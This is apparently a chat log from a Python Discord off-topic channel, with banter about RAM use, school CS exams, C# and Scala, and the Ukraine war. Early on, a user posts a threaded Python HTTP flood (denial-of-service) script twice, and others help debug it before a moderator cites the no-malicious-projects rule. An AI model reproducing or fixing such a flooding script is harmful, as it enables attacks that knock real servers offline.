#ot2-the-original-pubsta
652 messages Β· Page 115 of 1
OwO
The word and the bot, both sucks
No thanks 
https://github.com/Daniel-Liu-c0deb0t/uwu/blob/uwu/README_UWU.txt this should make you happy
Yeah I find joe snuffy uwu too
This.... killed all my brain cells. Thanks π
uwu
No
get uwu'd on
No
uwu OwO
Please don't 
Ironic hunter running away from furry
-> I ain't a furry
For some reason I'm neither a furry, nor a weeb
Yeah we know you shouldnt fear it a hunter has guns ....versus cute critters that you hunt
Dw I'm animal friendly
What do you hunt and glad you are animal friendly?
I hunt people who tend to hurt me π
BTW @digital bane
Is this common?
No lol
This is the Python server π
imagine having a portrait monitor that tall 
Mobile screenshot

huh i knew that was on android but just learned i have it too
no wait
not of discord at least
Eh, just click on the "Scroll" button after taking the screenshot and it will automatically scroll till the end
Lol neat trick
Indeed
import threading
import socket
target = ''
port = 80
fake_ip = '182.21.20.32'
already_connected = 0
def attack():
while True:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
s.sendto(("GET/"+ target + "HTTP/1.1\r\n").encode('ascii'), (target,port))
s.sendto(("Host:" + fake_ip + "\r\n\r\n").encode('ascii'), (target,port))
s.close()
global already_connected
already_connected +=1
if already_connected % 500 == 0:
print(already_connected)
for i in range(500):
thread= threading.Thread(target=attack)
thread.start()
@jovial island here
...
ok
so this floods the "fake_ip"
im seeing no errors on pycharm
no
when i add the main ip it will flood that one
or should atleast
where it says target i removed it for the sake of not wanting to get put offline lol
!rule 8
8. Do not help with ongoing exams. When helping with homework, help people learn how to do the assignment without doing it for them.
5. Do not provide or request help on projects that may break laws, breach terms of services, or are malicious or inappropriate.
ok then
i was running it on myself then my friend with permission to see if working
someone tell me if i should send the code
there is no intent on using this malicious activity
Hi. I wonder what is phyton homework
import threading
import socket
target = ''
port = 80
fake_ip = '182.21.20.32'
already_connected = 0
def attack():
while True:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
s.sendto(("GET /"+ target + "HTTP/1.1\r\n").encode('ascii'), (target,port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target,port))
s.close()
global already_connected
already_connected +=1
if already_connected % 500 == 0:
print(already_connected)
for i in range(500):
thread= threading.Thread(target=attack)
thread.start()```
its GET / not GET/
where at?
lemme check 1 other thing
there is 1 more
sorry took a while
?
@jovial island i edited it
was that the only error?
i think, try now
still winerror
ok
maybe its the \r\n
wait ik why i never added the ip
idk much abt socket
10061
i know pwn.remote whell
do you have pwntools?
whats that lol
File "C:\Users\nick\PycharmProjects\pythonProject1\test on friend .py", line 13, in attack
@nimble ivy
No connection could be made because the target machine actively refused it\
is your friend running the server program?
π
U both do know help channels exist right?
like voice call channels
try 127.0.0.1
ohhhhhhhhhhhhh, those exist?
π
jk i kneww, sorry toatlly forgot
Lol lets talk about the meaning of life or lack thereof ... whether the universe is a harsh or great place since the topic is talk so deep
@jovial island
Doesn't really matter.
As long as Discord doesn't use 4GB+ ram this won't do anything.
They don't have a 64 bit version anyways
Doesn't make sense why they would have a 64 bit
I can see them upgrading to 64bit if the activities become more popular and the games get bigger.
Mhmm
Canary did run up to 270mb ish
Still 130mb less quite an improvement.
Wait what? I installed canary and it took like 500 MB RAM sometimes more
And normal discord is weird tbh. Sometimes it takes only 130 MB even when am in a VC, but sometimes upto 300 MB even when I ain't in a VC
What were you doing?
Just chatting dude, that's why am surprised
Was not even in a VC
Depends on the chat as well, like pics and gifs bump the ram
Rapidly switching between etc
Hmm, it was discord bots channel
tbh i don't really mind how much it uses.
Recently moved to 32gb instead of 16 since i was hitting the max.
hi
Now at highest load having 17/18
i am going to cook a skinny cow named joe actually jk, taken from joe's place
Damn I only have 8 Gb lol
8 gigs yikes
Haha my former one had 4 GB
I used to run some AAA games on 8 gig it choked so hard
8gb today is like notepad size, right now i would recommend 16 for gaming or heavy work load and 32 if you want head space or you are gaming while compiling.
Indeed
You never ran into memory issues?
Some of my projects/ curiosities used a lot of ram lol
No
Think my largest python application was around 6-8gb
I mean, I get like 120 FPS in Valo and like 80 in FN
Not to mention, on the low graphics
If it's playable
Sure it is
i'd rather have 100 fps on low than 60 on medium.
Ikr
Personally have been playing dying light 2 for a fair bit]\
Never played that
Just got released :)
Lemme show u the graphics
Meh for some reason the game disconnected me from that match
Doesn't look to bad only the AA looks a bit weird but other than that
@rugged portal what's weird is that
when I use Discord in Firefox, RAM only gets near ~280 MB excluding system process
why you people are having 400+ is beyond my comprehension
i got 260 ish on canary
When i start up my windows at home my complete system ram is 6.5gb without having anything open lol
lol Manajaro + i3 takes only 270 MB for me
Looks like a good distro
Meaning to find one and clean my laptop by smacking linux on it since i quit gaming on it awhile ago
Indeed
is joe wise
He talks so deep so probably
The wise Joe is here π
I have an app written in C i got it from Github, that have start/stop in the same button and I'm trying to make a hotkey for it. Instead of clicking on it I want to press Space for example and it starts and pressing again stop it. Any idea how I may do that? Direct me to any clue. Thanks
https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa
https://docs.microsoft.com/en-us/windows/win32/winmsg/hooks
Windows hooks (assuming you're on windows)
keep in mind these tasks would probably be a whole ton easier with either Java (JNativeHook), Python (Pynput) or AHK
C is incredibly unreadable
Is it the second coming of the wise joe?
wow this is so surreal
???
Referring to messianic wise man returning of course....the wise man should bring enlightenment
Hahaha
Oh so deep reference to msjor world religions
imagine learning tuples and dicts
Omg multiple choice lol
i require more evidence
y'all know how to remove these annoying popups that come up everytime I'm tryna type in vscode bruh
oh ok
ik it's useful but like sometimes it just gets in the way π
especially when the popup is huge sometimes
you can disable by setting editor.snippetSuggestions to none
bruh
@visual slate I have tried, but ducky_boba is not turning out like how I briefly sketched and imagined in my head π
Duckba
i... i've never had such confused emotions in my entire life
I think I need to workshop it a bit more. This may be more boba emoji with a hint of duck than the other way around
π it may be a little unconventional but I'm already very appreciative of you spending time on it
π
π§
It's difficult to figure out how to put the two together, maybe just having the duck with its wings in front of it holding the boba? Although that does buck the trend of ducks slightly
if you unfocus your eyes a bit, it looks like a duck with belly stubble
You know there was the option to not say that :o
It's a universe I would like to go back to π
drink the duck
I was briefly tempted to have the duck drink its own boba tea but I couldn't even sketch how that would look and not be ridiculous
Lmao
Wa
@visual slate i ask who is the real criminal here
D:
Well who put in the effort beforehand, and thus gets a get out of jail free card for posting that atrocity? Not you Scoff :P
Question 20 sucks
Not only because making the first two options mutually exclusive kind of undermines the purpose of multiple choice, but also because the parenthesis don't make a tuple, the commas do
Ah, that way
!e py a = 1, 2 print(a, type(a))
@shrewd lance :white_check_mark: Your eval job has completed with return code 0.
(1, 2) <class 'tuple'>
Hence why (1) is not a tuple, but (1,) is
Yea, () without comma is/can be used for combining multiple coros together
like await (await bot.fetch_user(...)).send(...)
That's just parenthesis for proper operator precedence really
Mhm
But meh, idgaf. We got subjective exam anyways
we were bored, so were doing some MCQs
yeah true, the question does have an obvious answer and that's fine i guess
but I'm not a big fan of such small details being omitted
Well, here its something like, 50% paper should be easy, 30% paper should be average and the rest 20% should be tough to see which student is average and stuff (or idk it is something like that, I forgot the percentages)
So yea, that questions comes in the 50% quota imo lmao
it depends on whether you want to test knowledge or rank students
Well here, rank is more important than testing knowledge π
standardized multiple choice tests in programming courses don't seem like a good option to me, but that's the easiest route for an educational establishment to take, so it's understandable why it's that way
that sums it up really
It is a school exam anyways
yeah true, it's just a bit of a touchy topic for me
And yea, my school comp teacher dk shit about Python. She says a while True loop won't loop itself indefinitely but would instead stop at some point and let the code written after it, execute
that is one thing I can kind of appreciate about our school. The exams are just "know enough - you pass" "don't know enough - you fail", no curving or trying to make questions that differentiate the good students from the excellent ones
Well, in my school, only like 5-10 students out of 170 students have taken cs
sooo idrc about rank lmao
hello'
while True
Im fuked up tmrw is my exam of sst
anyone wanna do a type race?
F history
why not
Why yes??
holy shit my new record
join
gg
so many typos lol
gg
join again if you want
PC or Mobile?
factorio
Thank you a tons man I really appreciate it π
Anybody have idea what is this code written in π
js?
No c or c++ I think
looks more like c
also, in case you didn't know: Shift key + Windows key + S key -> gives you a tool that selects a rectangle on screen. takes screenshot and puts it in your clipboard and you can Control key + V key paste it to discord directly
Main.c , is one of the items
Great I'm gonna do this next time even though my laptop is probably gonna go boomπ
That's simpler and better, thanks πΏ
π
What is this code written in anyone knows?
main.c
so it's C
C++ is .cpp
also, i'm gonna go ahead and be corrupt: don't bother with C, learn Go instead π
Holy sh*t
I'm not trying to learn all I want to is to edit the code to add hotkey. I thought it was gonna be close to c#
noup

π ±οΈust
π¦ust
πΏust
that's pretty nice too
Very disturbing imagery
_client.OnError += _client_OnError;
private static void _client_OnError(object sender, ErrorMessage args)
{
Console.WriteLine(args.Message);
}```
is this good practice
w-wha
lmao
Hremm
Im sure C# is a great language but god looking at c# code makes me irrationally angry
man
Oh no
How does that even work, isnt OnError a method reference
private static readonly DiscordRpcClient _client = new DiscordRpcClient("737646410354130955", autoEvents: false);
forgot to add this
thanks π
So _client is a discord client, whats .OnError
Can you assign to method like that? Probably a list or array or whatever they call em
OnError might have an overloaded +
seems like it
I timed something in C++ using std::map instead of some fast hashmap implementation I found online, and it was like 1/3rd faster than the hashmap because I was using string keys
Is there any rule of thumb for what string sizes vs number of keys itβs better to use a hashmap instead of a tree?
it depends on too many factors to really have a rule of thumb, you may have to just measure
Alright
Its great , i have used it in actual projects
C# doesn't have top level functions, so that's a yikes
so to make a library with a single fucking function:
class Whatever public static {}{}
massive boilerplate
exact same function in scala:
makes C# look CRINGE
whaa
does java
no
lmao
java has the same boilerplate as C# you see rn
Scala, Kotlin, both are targeting JVM
scala is easily the most concise, more than python even
there is a lot about scala i like
but the fact it's unopinionated, means you have like 5 cults
each having their own stack, their own phylosophy their own tools and conventions
so to get any shit done you gotta learn WAY too much
skults
source: a guy on Scala discord that looks like he knows what he's saying but i don't actually know if he does
yea but like
just today i wanted to use akka library for discord bot on scala: the repo is down
okay, Scala has Java binding terrific
let's go with Discord4j right?
wrong, i get to like, some reactor thing, and now i'd have to learn the entire shit how reactor handles async
want to add database? terrific, chose one of those 12908372190 stacks, and learn the whole ecosystem
and then you can actually start using database, yay
π
how to chose? it's easy because you don't know shit, just learn every single one
in 10000 years maybe you make a bot that logs chat commands in db
π₯²
I help :c this channel is mean
Sorry all non helpful help desk people are busy nao ... please try your call later
Hi
!unnominate @naive finch smh
I'm editing on an app made in C, there is a button in the app for Start/stop and I want to make a shortcut for that button so for example if I press SPACE key it will start, press it again and it will stop. The app used Iup library or something
I was so confused then I saw the name :P I don't know if you're lucky or unlucky lol I'd love a channel with my name xD but then if it was that I'm not sure if I would
I'm just joking, it is cool seeing my name on a channel c: Ill have to look and see when the name got made
I kinda figured you were joking, I was kinda too though also trying to say that if I were you I'd rather a channel name like Griff-for-president or something lol.
That is a good idea, Griff for president
I like it, it had a nice ring to it
Rolls off the tongue
Yknow I gotta agree
Well at least not helping doesnt harm ...sometimes if you do help you do unintentional harm....
The Hippocratic Oath is an oath of ethics historically taken by physicians. It is one of the most widely known of Greek medical texts. In its original form, it requires a new physician to swear, by a number of healing gods, to uphold specific ethical standards. The oath is the earliest expression of medical ethics in the Western world, establish...
Primum non nocere (Classical Latin: [ΛpriΛmΕ©Λ noΛn nΙΛkeΛrΙ]) is a Latin phrase that means "first, do no harm". The phrase is sometimes recorded as primum nil nocere.Non-maleficence, which is derived from the maxim, is one of the principal precepts of bioethics that all students in healthcare are taught in school and is a fundamental principle t...
wake up, in pain, sleep, repeat 3 times, its night now
well that was fun
Griff, this wasn't expected from you π
guys can anyone help me with setting up visual studio on mac m1 and codibng c++ ?
yes vs is available on mac
Yea
I was sent here by putins friends
for country in world:
if not country.nato_member:
russia.invade(country)
#WithUkraineWeStand πΊπ¦ πΈπͺ
why do you make me report you to modmail
U still gotta follow rule 1
@remote widgetwhy u follow me into offtopic chan n threat with modmails?
!rule 1
1. Follow the Python Discord Code of Conduct.
so what part of rule 1 did i break?
The war is a sensitive topic and according to the code of conduct, u shouldn't talk about sensitive topics (:

if i put ukraine avatar thats also sensitive and breaking rules?
we don't ban talk about the war, as long as everyone keeps it civil
ty
Well we were normally talking about it the other day but Tizzy said otherwise if I remember correctly
All ididwas showing a pythong code kinda mimic situation n showing support
for country in world:
if not country.nato_member:
russia.invade(country)
That's why no one talks about it in #ot0-fear-of-python anymore
@remote widgethe is projectleader and moderation team ... you are a white name
he said its fine aslong we dont fight about it
I'm just clearing my stand bruv
and we are keeping it civil
I don't want to be the target for someone's blame that I was the one who used to tell everyone not to talk about war and stuff
πΈπͺ is Sweden's flag lol
its not like we actually talking about the war persay or hating
i am swede π
-did you mean to put Sweden's flag?
Yoooo, same!
We're neutral π¬
PΓ₯ riktigt?
Why do u make me use the rule command 
on paper but not in practice lol
Lmao
This is Sweden's Language?
Ah
we reconsidered our policy
he thought i missused swedenflag insteadof ukraine
Ah, okay. Thanks for telling!
Hahaha
no worries
yeah we'll allow it but since it's a sensitive topic we may shut down conversations still
but that goes for anything
@dusky cliffthats good it would be very sketchy if wasnt allowed at all
even python
Okay
I made a module to store data in JSON format in discord messages
@hollow heartdid i say anything wrong?
imagine not having constants in python
Agreed 1000%
no no
good
i mean u said evenpython
oh no
and iposted this ```py
for country in world:
if not country.nato_member:
russia.invade(country)
i mean even with python discussion, things can get heated and devolve into insults
so even in those cases we'd shut down discussions
ye if they russian and cant handle it
lol
yeah
how come?
imo there's something to be said about timing right?
i mean kinda what is going on in reality
they even sent 4 jets into sweden air-space last day ... and we arent nato
i get it. some other mods may feel different only this. but i don't see such conversations ending too well
Mhm
if i change russia into putin?
Well Russia did issue warnings to Finland and Sweden
yup
talking about current events is fine. just be considerate of the audience
i dont try upset anyone
Since they both ain't in NATO, and USA doesn't really do much all of a sudden, those both countries are also easy targets
just showing my support to ukraine and that we are also not nato members so is we next?
yes
but i still think we have support from whole world
Meh, as if emotional support helps win wars
it would loook really bad for putin if even start come here
where's "here"
Well, there was this news a few days back (idk a friend told me). Putin was literally shouting and was mad at his inner circle just cz they weren't able to capture Ukraine easily and didn't plan all this correctly
from korea, but american
its hard with news u dont know if real or fake
but i belive putin dont like looking weak as he does now
Indeed
ah cool
south korea i guess then
or did u escape kim jung un
i didn't escape no
just a joke
but defectees aren't uncommon
you prob borned in usa
i wasn't
i probably have relatives in NK. the division into NK and SK was arbitrary by foreign powers
i was a baby
cold wars cri
damn that is complex too i know so many families are splitted by NK n SK
cold wars we are back to @jade bolt
imagine threating with nukes
2022
only putin would do that
and NK
threatening with nukes brings peace, at least no one has the balls to destroy that peace
we will see
:areyousureaboutthat:
putin said whats point of world if russia has no place in it... therefor he threats with nukes
why u wanna nuke such a cool skribbl player π
π
oh btw, I'm from Mars I've got nukes immune
Really? I also have a friend from Mars
how can you confirm π
sorry for your loss /j
I might have uh, nuked mars
NO WHAT WHYYYYYYYYYYYYYYY
maybe ur a propagandapuppet for elon musk π
no, we hate Elon Musk
starship launch when
starlink stops us from tracking earth
lol btw aparently a teenager who tracks elons musk privet jet n tweets when it lifts n lands now doing same with russian oligarchs lmao
we keep try keeping it calm
what
LMAO
we have space nukes btw
@remote widgetits true
Damnnn
@jade boltis moon just a sattelit?
:O
darthwader
moon is fake
hahaha
it's just a reflect of mars
artificial
oh damn thats deep
π
(i have no issue with trolling) lol but i thought we was talking serious about ukraine putin vs world
A black and white reflection of Mars*
I'm slower here, it's just synced to earth for now, but I'm actually seeing 1011 instead of 2022
but y, the price > the gain
ofc
anyways bye chat
but you know if we all become members of nato
1 attack on 1cm is war on all
this is not good future for the world
we civilians dont want ww3
but what can we do if our leaders are greedy n has small genitals complex
BTW: news today
russian buisnessman offers 1$ million USD to the one kills putin
Which bounty
Lets steer away from that
ok is it too edgy
yeah, its talking about an assassination of someone
Ok we can say this then i think only way to calm putin down is if his own peoples try talk sense to him
ur right thats not cool but i just say what news said
I understand, I just think that is where the convo should redirect (I'm not a mod, just my opinion)
nah i feel u then
don't you just love, when your boss is the bottleneck of something
i didnt wanna go too deep into it just say out loud what was said in news
"Why isn't this done yet?!?!?!"
"is this done yet? could you kindly do it today?"
lol
what u mean?
Usually an approval chain
sorry my english is not perfect like urs
like use nukes, they say oh u cant have a "maniac" just press buttons - but dont then forget old soviet all around are old soviet generals
they will not disaproove
such a request
I think Mina and I were talking about working in an office
oh
Not the nuclear launch sequence
you guys likes it?
Sure, I get paid well and I do interesting work
covid must have been nice then for u working from home?
working from home is not ideal if you don't have dedicated office space
shorts n ugly tshirt π
i know
its easy to be lazy n not get zooned in
its like sum say dont ever chill in your gym-clothes
like tshirt sweatpants
cause then ur brain gonna think its chilltime on gym, etc
@hollow hearthow old are u in ur 30s?
20s
i'd rather not say
i respect that
sum has no issue tell sum wanna keep it private
@slate leaf@hollow heart
can i ask what you both working with in office?
classified too?
i dont need details just are u coding or selling stocks (alot of phone)?
ok i keep going nice chatting even if i tried chat more
yeah but its like doing it to your kid it really shows whos behind such a thing
Why does the Function I yellow circle does not see the variable above ?!!
!sm s #ot2-the-original-pubsta 0s
0s is not a valid duration string.
!sm reset #ot2-the-original-pubsta
β The slowmode delay for #ot2-the-original-pubsta is now 0 seconds.
Thanks
!sm reset #ot2-the-original-pubsta 2s
oh no, I seem to have lost my mod privileges
@remote widget help 
Hm?
how the heck do I get a project key on deta
I don't remember but the docs have specified the way. Lemme see
thanku
i couldnt find it
Deta Base?
yeah
Project Keys: Project keys interact with both your data and your resources inside a project (currently allowing reads and writes for the project's Bases and Drives). A project key will be created for you when you create a project, and you can manage all of a project's keys from the 'Settings' option in any project's sidebar. If this key is leaked, the data stored in any of the connected project's Bases and Drives can be compromised.
orait thanks

also, why the heck do I gotta join Slack for verifying 
Idk, I don't remember the registration procedure tbh
waza
waza?
I don't know why this variable gives me this error, I've been trying for 3 days, please help .
why do you have squiggly lines and whats the code that's actually calling GetNodeCode
squiggly lines just for bad formatting, the code get's called from another class, it runs fine without the underlined Variable
can you show the code that creates and calls GetNodeCode?
okay 1 sec
their is a list of nodes and it get's code for each item in the list and just preforms the function in order to get the return code
Not sure whats wrong tbh
the error takes me back to the If Item Line
GetNodeCode is overWritten from parent class
Can you show the code that creates this list of nodes?
This is how does are registered
@remote widget why the heck do they send me this 
Idk (iirc Mustafa is the owner name)
even if i join it, my account doesnt get verified 
Why tho
idk, i've joined with like 2 accounts before, this is my third time trying, they both arent verified yet, been 2 hours
Checked yr email? And the spam folder?
yeah
Weird
oh wait, the spam folder 
doesnt have it
its showing in the all mails section weirdly
So it's there?

the rectangles look fancy although I like the nav
those rectangles were an out of the blue idea
did a lot of UI design
@pastel arch if you've done a lot of gui stuff and want to do something different, maybe have a look at some of the more complex stuff here: https://nedbatchelder.com/text/kindling.html. Something else you might enjoy is doing previous Advent of Code from previous years
ok
green on black is a sick combination
Rudely, GIMME THAT THEME
@jovial island
makes sense
https://www.backblaze.com/blog/megabits-vs-megabytes/
@jovial island just read this article
no one uses bits tho
Low level programmer be like: Am I a joke to you?!
no
You can't even store a single character in a single bit
I don't think nobody goes that low level
sad assembly noises
Lmao people are people
Holy shit, you're right, assembly exists

π

wdym?
still π
well python was made with C and thats why its slow but ny question is what wouldve happen to the whole python language if it werent made by C and just raw assembly
but it isnt, so why waste brain imagining
Indeed

I guess it would've been faster since you're eliminating C as a middle man
yeah but what wouldve happen to its syntax i.e booleans
Depends
Depends on how the Python devs decided to implement them tbh
what do you want more than a kiss π
cool to think about it
I just wanna say to stop with all these emojis
Either a lot of work for the language's developers or for the users
a hug
I look at C code and all I can think of is, "Thank god Python exists"
Lmao ikr


relatable, same goes for me with js
why nitro flex π
ayo JS is easy
until u don't look at the difficult part ofc

compared to C, it is.
Well, JS is difficult to a Python dev, but still its easier lol
you do know advanced stuff isnt easy
Just don't look at JS's implementation of classes and OOP, in general and u gonna be fine
me who learned ruby: 
Python has the easiest syntax imo. No matter how advanced the code.
Even OOP makes sense most of the time
Indeed
nah its alright, i'm gonna get fired from my intern 
thats why its such a popular lan
Lmao
its readable in every way
That's not why it's slow
basic english welp
Indeed
But then, look into coffeescript lmao
The only reason I left it was it doesn't has good typing support like typescript
It's slow because it's insanely dynamic, and to a (arguably) lesser extent, because it has an interpreter
why so implementation?
Tell that to my middle school brother who didn't write the output of a simple Python program in an exam cuz "it was too technical"
I explained here. Messages aren't sending because my connection is really bad.
ah i was always told it was because of c but its just very dynamic?
It's definitely not because of c
The interpreter is compiled to machine code
And machine code is blazing fast
Indeed
you mean like the code gets turn in the machine code and it takes time hence it being very dynamic or?
No
may you explain
The interpreter you install is machine code
Your python code is executed by that interpreter
oki, just read the Python's source code ezzz
I'm trying, my service is just really bad
yeah ik about that
no comments, cant comment till I know what the "simple" program might be
Isn't all code just machine code in the very end?
ah its fine
a = 50
if a > 30:
print("Hello")
else:
print("World")
I mean, not really. You typically only say that when the compiler is directly converting the source code to machine code.
But if your program is running, that means the computer is understanding it which is only possible when it's in binary.
I seriously recommend learning 2nd grade/3rd year math
I was like, bruh, you kidding me, right?
I mean, yes, I guess
But thinking about it like that is udall
s/udall/useless
ayo dawn's messages coming all of a sudden
Imagine if he had to obey a slowdown in the channel
oof
My school must have some sort of cellphone service jammer istg
It's perfect once you get into the parking lot
I have been the victim for the same many times
AAAAH ik the feeling. Same happens in my school, the net hardly works
Is it an old building
Was it built on the graves of old nokia phones
go to a good school tell them to fix it 
Eh even the teachers' mobile don't work
Make an EMP generator. Destroy the tyranny.
Its ghost interference
power
LMAOOOO
And yea, u all know about the school's super net which never works for some reason
My school changes their WiFi password every fucking week.
mine is good, 1261 mbps
:
lol
well the WiFi is setup at the reception and the skool is soooooo fucking big the range doesn't even reach a single classroom π€£
wait....isnt that common sense to use extensions 
Can't they buy more routers?
I wish the school had such a budget π
It's probably just to prevent the students from accessing it
Eh, no one really cares. It is slow asf anyways
imagine them eating up 3/4 of what you give and generously spending 1/4 on the school's infrastructure π
Lmao
That's the state of most private schools where I live.
imagine
Same
Your school WiFi is so slow that if someone were to DDOS it, nobody would even notice.
LMAOOOO Correct
Are you by any chance from India?
Lol, same
is 1/4 of the server population filled with Indians or smth 
Lmao
or a better question, is 1/4 of the programming community filled with Indians?
Facts
Indians like programming, I guess.
Cannot say, everyone around me dk how to code
Lmao
Same. I'm one of 2 programmers in my section of 60.
1.5 billion out of 7 billion, cant say much
I am talking about 150 students here
Only one or two excluding me have an interest
Oh if I take my whole class, then it's something like 2/300.
!e print((138/775.3)*100)
@remote widget :white_check_mark: Your eval job has completed with return code 0.
17.79956146007997
What did you just calculate?
Close to one sixth
more or less, yea
thats better ig :/ everyone around me says python is hard and get happy after using a class to add 2 numbers
Lmao
Let's do this a bit precisely.
Number of total programmers = 20 million
Number of Indian developers (estimated in 2018) = 5.2 million
Percentage = 26%
same goes with that teacher, telling us to make a classmethod to find the median in a list :/ more than half the class be copying code from the internet like what
Ayo that's more than 1/4th
And that was the estimate in 2018
Me who hasn't read about classes in school: πΆ
O
Programming on school level is a joke
school cs classes are a big lie, they teach arithmetic operations and call it coding, the teachers barely themselves know anything
facts
We're supposed to learn about functions in 12th grade. Bro what about classes and threading and GUIs? Nothing.
understandable, ours read the docs without any explanation
π€£ ikr
who learns anything in cs class......
ours don't even know what are docs and something like that exists
Utewb tewtoereals stewdents 
outdated(
What the
I had a funny incident happen to me recently where my CS teacher asked me in a viva what the trim method did to a string?
I said that I hadn't heard of it and that it sounded similar to strip() from Python and explained that instead.
Later, I showed her that nothing like trim() even existed in Python, and she just said "Oh I was just testing your knowledge and confidence!"
Lmao
Definitely not people who actually program
I don't program anything π
Shit. I gotta go. I have an English exam tomorrow.
do the same to her in your cs exam, write invalid programs, sue her for not being knowledgeable and correcting them instead
I had one today lmaooo
Wish me luck or something
Eh, English do be easy
oh damn good luck, ace it 
Lol, it'll be fun writing solutions with Classes and the teacher just having a stroke
very easy indeed
Thanks
The knowledge I've gathered from watching way too many web series and Hollywood movies shall finally come to use!
did that a lot, wrote a 27 line long add function when the teacher was expecting 2, got full grades in the practical because the teavher didnt know what default parameter values are or what isinstance does
Actually I did something like this... There was this question where we had to make a cli program replicating a bank process to deposit, withdraw money and stuff, but I just used tkinter to create the same and the teacher didn't even take a complete look at it π€£
atlast
Y'all have courage I can't fathom
IKRRR
See. I'm already pulling out random good-looking words!
Ok now I'm definitely going
Byeee
Lmao
bai bai, take care 
how you get full grades
||btw I do know the code has two major flaws, but i fixed them after taking the ss||
imagine using typing
why did u even set those to None if u need the args
good thing the teacher thought that the module is something related to typing on the keyboard
LMAO
cz why not
π u just increasing the execution time
I just needed the teacher to get a stroke as fast as possible so she wont pay much attention 
welcome
@jovial island
Can u do me a favor? Just use the sum() function instead of doing this
hm?
impossible
Why
idk
smh
Yo, I'm back. Read the Ailing Planet.
Why are you checking for None if it's already confirmed thay the variable is an int π₯΄
Not my code π
MOST BORING CHAPTER IN ENTIRE ENGLISH
The flaws don't matter if your goal was accomplished. That is, giving the teacher a stroke.
At least it's about saving the planet (which I deeply resonate with). Wait till you read Silk Road
lol
And you liked Silk Road more?
hunter too intelligent for this shit π
Agreed
Meh, intelligent is the wrong word
uwu?
And now I'll go read about Albert Einstein in school. Probably the most ironic chapter this year.
It is fun tbh
He do be trying his best to drop out of school
Still boring
The better chapters were Birth and Browning Version imho
No, he's just too fed up with this intellectually inferior bullcrap
:)
ayo I don't understand anything what do u mean
imagine reading about dead humans π no offence to the dead people
biographies goes brrrr
That Childhood poem is pretty good too btw
lmaoooooooo, imma save that
Ah yes, the best thing was: all adults are hypocrites
TIL, I may be an adult. π¬
imagine being an english native hunter
totally u
lmao
u ain't above 18 unless u failed 11th twice
Bruh.
"twice"
I said that because you said adults were hypocrites
Must suck to be an adult tbh
every adult ik do be sleeping
Lol same
Uhh wait I think one of them should be awake since he is in the US
Lemme see
Let's ask his views lmao
Let me guess, he's a cousin?
Meh, a discord friend
Oh ok
nvm he do be busy spoiling his nephew
Hmm... See you after 6 pages
lol cya
That was... An interesting read
@jovial island sleep
@remote widget hows your cold
I nearly asked how's your code lmao
See, in order to need to prove something is false, wouldnt you already need credible evidence suggesting itβs real? Otherwise, proving it false isnt necessary
@clever laurel
Yep.
And proving in the sense...Well some guys need to be proved wrong.
So, yeah.
Well, I would ask them 15 qs.
On happiness.
And then, they need to fill it.
And then I would collect all the data.
See the patterns.
And make a summary! ^^
bonk
I was sleeping, and yea it's better now
I'll be uploading it on GitHub and the atom community themes don't worry lol
Honestly, controversial opinion, i think pancakes are better wo syrup
anonymous cake or cupcake
Cake ez
^^^
Cupcake u get frosting on ur nose
only if you take bites of it
i eat the whole cupcake
How lol
and when i do i do frosting down and then it would easily go in (please dont say anything)
So ur literally like a python; eating everything whole lol
less messy and im able to compress the cake itself
yeah
i like orange peels
like by themselves
You were made for this language lol
I hear they actually are fine to eat, and even have some good stuff there
adding extra updates later
yeah
pineapple on pizza?
But ye, bread isnt a place to put a fruit salad


